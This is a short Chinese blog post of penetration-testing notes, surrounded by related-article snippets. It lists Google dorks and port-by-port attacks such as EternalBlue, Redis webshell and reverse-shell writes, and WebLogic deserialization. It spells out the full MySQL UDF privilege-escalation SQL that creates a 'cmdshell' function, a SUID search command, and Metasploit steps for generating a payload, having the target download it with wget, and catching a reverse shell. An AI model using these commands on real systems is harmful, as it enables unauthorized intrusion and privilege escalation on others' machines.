简单渗透实战

最新推荐文章于 2025-12-03 19:42:25 发布
原创 最新推荐文章于 2025-12-03 19:42:25 发布 · 116 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络

信息收集

google

site:edu.cn intext:后台管理 //限定后缀查找内容

inurl:github.com xx //限定网页查找

fofa

shodan

21 FTP 匿名访问爆破

22 ssh 爆破九头蛇 msf 工具...

445 永恒之蓝 ms17-01 0

1433 sql server 爆破 xp_ cmdshell提权

3306 mysq|爆破 root 提权 udf提权

6379 redis 未授权访问 写公钥 写webshell 定时任务 反弹shell 主从复制RCE

7001/7002 weblogic java的反序列化 弱口令

8080/8089 jboss Jenkins java反序列化弱口令

27017/27018 MongoDB 爆破 未授权

888/8888宝塔

dirsearch 扫描 //比较多自定义,当全部返回200时候可以利用字节大小去除

拿站

bp

sqllmap

csrf

文件上传

rce

ssrf

蚁剑

插件提权

mysql udf提权 //需要通过数据库连接,用户必须权限足够

select version();      #查看版本
如果版本号大于5.1.4 上传udf的位置应该放在mysql\lib\plugin【如果不存在目录 自己新建一个】
如果版本小于5.1 上传udf的位置应该放在c盘的windows或者windows32目录里
​
show variables like "%plugin%"    #查看plugin位置
show variables like "%secure%"    #查看secure_file_priv,NULL才可以提权
show variables like "%compile%";     #查看数据库是多少位的
​
cd /usr/share/metasploit-framework/data/exploit/mysql  //kali下载udf 文件末为.so,则为linux系统,如果是win,则后缀为dll
ls -la
​
python -m http.server  //kali开服务器下载udf
create function cmdshell returns string soname 'myudf.dll'; //cmdshell是自定义函数,可以更换
​
select cmdshell('whoami');
​
#只能连接数据库的提权
create table udfeval(shellcode longblob);    #创建表
​
insert into udfeval values(load_file('F:/udf.dll'));  #在表里插入信息
​
select shellcode from udfeval into dumpfile 'C:\\windows\udf.dll';  #将表里面的信息导出
​
create function cmdshell returns string soname 'F:/phpstudy/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll';
​
select * from func;
​
select cmdshell('whoami');

linux提权

find / -perm -u=s -type f 2>/dev/null //寻找提权命令

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool msf运行.sh

cs

msf

  1. msf生成elf/exe马

  2. python -m httpserver 服务器开启下载

  3. wegt ip/shell 目标主机连接下载

  4. chmod -x shell 给权限后运行

  5. use exploit/muti/handler 配置msf监听上线,反弹


                

        

    


  



    

      

        

            

              
                
                  Jang2023
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
app渗透测试实战Getshell

				
			

			

				

					渗透之路,攻防之间皆学问
				

				

					05-17
					
					9638
					
				

			

		

		

			
				
分享一下今天对某app的合法渗透测试,从基础的信息收集到拿到网站的shell的过程。

			
		

	



                

            
              



	

		

			

				
					
渗透测试实战流程详解

				
			

			

				

					qq_28205153的博客
				

				

					08-13
					
					2511
					
				

			

		

		

			
				
本文将先建立一个系统思维,对实战中怎样通过渗透拿下一个网站的思路(也是黑客的攻击方式)进行讲解,并对其中用到的技术进行简单介绍,后面的文章再对每项技术进行实战讲解,也就是总分结构,带你搞懂渗透的流程。

			
		

	



              


  
              

                


	

		

			

				
					
渗透实战:内网域渗透

					
热门推荐

				
			

			

				

					kali_Ma的博客
				

				

					11-22
					
					3万+
					
				

			

		

		

			
				
前言
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
网络拓扑如下:

web服务器
先来波端口扫描:


直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web

			
		

	





	

		

			

				
					
WEB渗透实战

				
			

			

				

					m0_57929980的博客
				

				

					06-25
					
					9402
					
				

			

		

		

			
				
WEB渗透实战篇:介绍文件上传漏洞、跨站脚本攻击、SQL注入漏洞、文件包含漏洞、反序列化漏洞原理及利用

			
		

	



		

			
		



	

		

			

				
					
一次渗透测试实战

				
			

			

				

					m0_46467017的博客
				

				

					04-23
					
					3万+
					
				

			

		

		

			
				
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结
前言
学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。
信息收集
这次的

			
		

	





	

		

			

				
					
简单渗透测试实战过程

				
			

			

				

					ddchggf的博客
				

				

					07-30
					
					2268
					
				

			

		

		

			
				
看到两个参数都有注入点,任选一个,选择站点语言,看到获取到os-shell,发现无法执行命令,选择另一种方法sql-shell。在某天平台的挖洞实战,习惯先用AWVS扫一波,自己手工再去挖,通过sql-shell上传木马文件,拿到shell。AWVS还是很给力,扫出了几个注入点。查看到某后台的登录管理员用户名。...

			
		

	





	

		

			

				
					
php网站渗透实战_实战讲解TP3框架下的渗透思路

				
			

			

				

					weixin_39888180的博客
				

				

					12-19
					
					1736
					
				

			

		

		

			
				
第一次投稿,表哥们亲拍1、 ThinkPHPThinkPHP是一个开源免费的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。同时遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产品发布/销售ThinkPHP (TP) 算是国内主流的一个PHP框架,首先上手快,资料多,学习...

			
		

	





	

		

			

				
					
php网站渗透实战_【案例分析】记一次综合靶场实战渗透

				
			

			

				

					weixin_39981360的博客
				

				

					12-19
					
					991
					
				

			

		

		

			
				
原标题:【案例分析】记一次综合靶场实战渗透时间有点久,这里主要和大家分享一下思路。该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网。开始渗透首先进入靶场开放的唯一一个开放的web端。进入网站首页,发现是Mallbuilder,并且该版本有注入漏洞,可以直接获取管理员密码。payload:/cate_show_ajax.php?oper=ajax& call=get...

			
		

	





	

		

			

				
					
《内网渗透实战攻略》读书笔记

				
			

			

				

					Ays.Ie的博客
				

				

					06-02
					
					1211
					
				

			

		

		

			
				
《内网渗透实战攻略》读书笔记

			
		

	





	

		

			

				
					
渗透实战:内网域渗透_内网渗透实例

				
			

			

				

					2401_84578953的博客
				

				

					11-06
					
					900
					
				

			

		

		

			
				
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。

			
		

	





	

		

			

				
					
内网安全攻防渗透测试实战指南.pptx

				
			

			

				

					07-01
				

			

		

		

			
				
内网安全攻防渗透测试实战指南  内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。  内网安全攻防渗透测试实战指南主要包含...

			
		

	





	

		

			

				
					
Kali Linux渗透测试实战

				
			

			

				

					03-10
				

			

		

		

			
				
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...

			
		

	





	

		

			

				
					
TCP,UDP使用socket编程流程

				
			

			

				

					weixin_46855342的博客
				

				

					12-01
					
					105
					
				

			

		

		

			
				
UDP socket编程流;

			
		

	





	

		

			

				
					
【Android逆向工程】第19章:协议分析与接口还原

				
			

			

				

					w987333120的博客
				

				

					12-03
					
					346
					
				

			

		

		

			
				
本文介绍了网络协议分析的关键技术与工具。主要内容包括HTTP/HTTPS协议分析流程、常用抓包工具配置(Charles/Burp Suite)、协议格式解析方法以及签名算法还原技术。通过示例展示了完整的请求/响应分析过程,涵盖请求行、请求头、请求体的解析方法,特别关注签名相关字段的识别。文章还提供了Python代码示例演示如何自动分析HTTP请求结构,帮助逆向工程师理解业务逻辑、还原接口签名算法并实现自动化脚本。

			
		

	





	

		

			

				
					
多厂商配置对齐器:AI 如何在 Cisco / Huawei / Juniper 间做语义映射

					
最新发布

				
			

			

				

					oQianYuan的博客
				

				

					12-03
					
					452
					
				

			

		

		

			
				
这些模型上的差异,使得简单的“语法级模板替换”永远会失败。“给我一个能阻止外网 SSH 进入财务内网的安全策略,并在所有出口设备上同步生效(Cisco/Huawei/Juniper 各一套)。需特别注意 mask 类型的标准化,AI 内部统一用 CIDR (/24) 或 Wildcard 存储,渲染时再转换。/* 假设 Gi0/0 属于 untrust,内网为 trust */在过去十几年里,不同厂商 CLI 的“语法差异”从来不是最难的问题。AI 在多厂商对齐中的真正价值,是负责把。

			
		

	





	

		

			

				
					
网络安全(黑客技术)—2025自学手册

				
			

			

				

					2401_84760527的博客
				

				

					11-24
					
					1594
					
				

			

		

		

			
				
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。

			
		

	





	

		

			

				
					
openEuler + Nginx 高性能 Web 服务深度评测

				
			

			

				

					笃行其道的博客
				

				

					12-03
					
					772
					
				

			

		

		

			
				
本文介绍了在openEuler操作系统上部署Nginx集群的性能测试方案。通过优化内核参数、资源限制和系统调优,在32核64GB环境的华为云实例上进行八大维度的压测:静态文件服务测试显示小文件QPS达23万+,大文件传输速率13.97GB/s;反向代理性能测试QPS23万;HTTPS测试降幅仅16%;长连接测试QPS8.6万;压缩测试显示99%压缩率;极限测试支撑10万+并发。测试结果表明,openEuler的网络/I/O优化与Nginx事件驱动架构完美结合,CPU利用率96%且内存占用<10%,延迟

			
		

	





	

		

			

				
					
如何解决ws2_32.dll丢失问题:解决网络相关错误和程序崩溃的完美方案

				
			

			

				

					xiaoshuotui的博客
				

				

					12-02
					
					933
					
				

			

		

		

			
				
当你尝试启动一个程序或游戏时,突然遭遇“ws2_32.dll丢失”的错误,这可能会让你的计划受阻。幸运的是,这个问题通常有直接的解决方法。本文将详细介绍如何找出丢失或损坏的ws2_32.dll文件,并提供有效的修复策略,让你的电脑重新运行起来。

			
		

	





	

		

			

				
					
学习:《The QUIC Transport Protocol: Design and Internet-Scale Deployment》

				
			

			

				

					qq_45913654的博客
				

				

					12-02
					
					533
					
				

			

		

		

			
				
QUIC协议是基于UDP的新型传输协议,旨在解决TCP协议在互联网环境中的固有缺陷。

			
		

	





	

		

			

				
					
冰河的渗透实战笔记

				
			

			

				

					05-11
				

			

		

		

			
				
### 冰河渗透测试实战笔记的相关资源

冰河的《渗透测试实战笔记》是一本专注于实际操作和技术应用的安全类电子书,其内容涵盖了大量实用的技术案例和实践经验[^1]。该书的特点在于注重实战而非单纯理论讲解,适合初学者快速入门并实践网络安全领域中的渗透测试技能。

#### 资源获取方式
对于希望获得此电子书或其他相关教程的学习者来说,可以尝试通过以下途径寻找相关内容:

1. **官方网站或作者博客**  
   通常情况下,安全技术书籍的作者会在个人网站或者博客中分享部分章节预览以及购买链接。例如,《冰河的渗透实战笔记》可能在其官网提供试读版下载或详细介绍页面[^2]。

2. **在线学习平台**  
   像 Udemy、Coursera 这样的教育平台上可能会有基于此类主题开发的课程。虽然这些课程未必完全复制自某一本特定书籍,但它们往往能够补充更多动态演示视频等内容形式,帮助理解复杂概念。

3. **GitHub 开源项目**  
   鉴于提到过编写过多本开源电子书的经历[^3],不妨前往 GitHub 搜索是否有类似的公开仓库存在。“IceRiver”作为关键词配合其他限定条件(如 `in:title`),或许能找到一些有价值的资料集合。

4. **社区论坛交流区**  
   Hacker News、Reddit 的 r/netsec 子板块都是讨论信息安全话题的好地方,在那里提问关于具体教材的需求也容易引起志同道合者的注意进而得到推荐清单。

5. **图书馆借阅服务**  
    如果所在地区支持数字化馆藏,则可以直接查询本地公共/大学图书馆是否收录了目标作品;即使未找到确切版本号也可能发现相似替代品供参考之用。

以下是实现简单爬虫脚本来抓取网络上潜在可用链接的一个 Python 示例程序片段:
```python
import requests
from bs4 import BeautifulSoup

def search_resources(query):
    url = f"https://www.google.com/search?q={query}"
    headers = {"User-Agent": "Mozilla/5.0"}
    
    response = requests.get(url, headers=headers)
    soup = BeautifulSoup(response.text, 'html.parser')
    
    results = []
    for item in soup.select('.tF2Cxc'):
        title = item.find('h3').get_text()
        link = item.find('a')['href']
        snippet = item.find('span', class_='st').get_text()
        
        result = {
            "title": title,
            "link": link,
            "snippet": snippet
        }
        results.append(result)

    return results

if __name__ == "__main__":
    query = input("Enter your query: ")
    resources = search_resources(query)
    for res in resources[:5]:
        print(f"{res['title']}\n{res['link']}\n{res['snippet']}\n")
```



			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  

	
    

      

      

      

        
        

          
          

            

              成就一亿技术人!
            

            

              拼手气红包6.0元
            

          

        

        

          

            还能输入1000个字符
          

          

             
          

          

            

              红包
              添加红包
            

            

              表情包
              插入表情
              

                

              

            

            

              表情包
              代码片
              

                
              

            

            

              
              
              
              
              
              
              
            

          

        

      

    

		

			

			

			

					 条评论被折叠 查看
			

			

				
			

		

	

	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值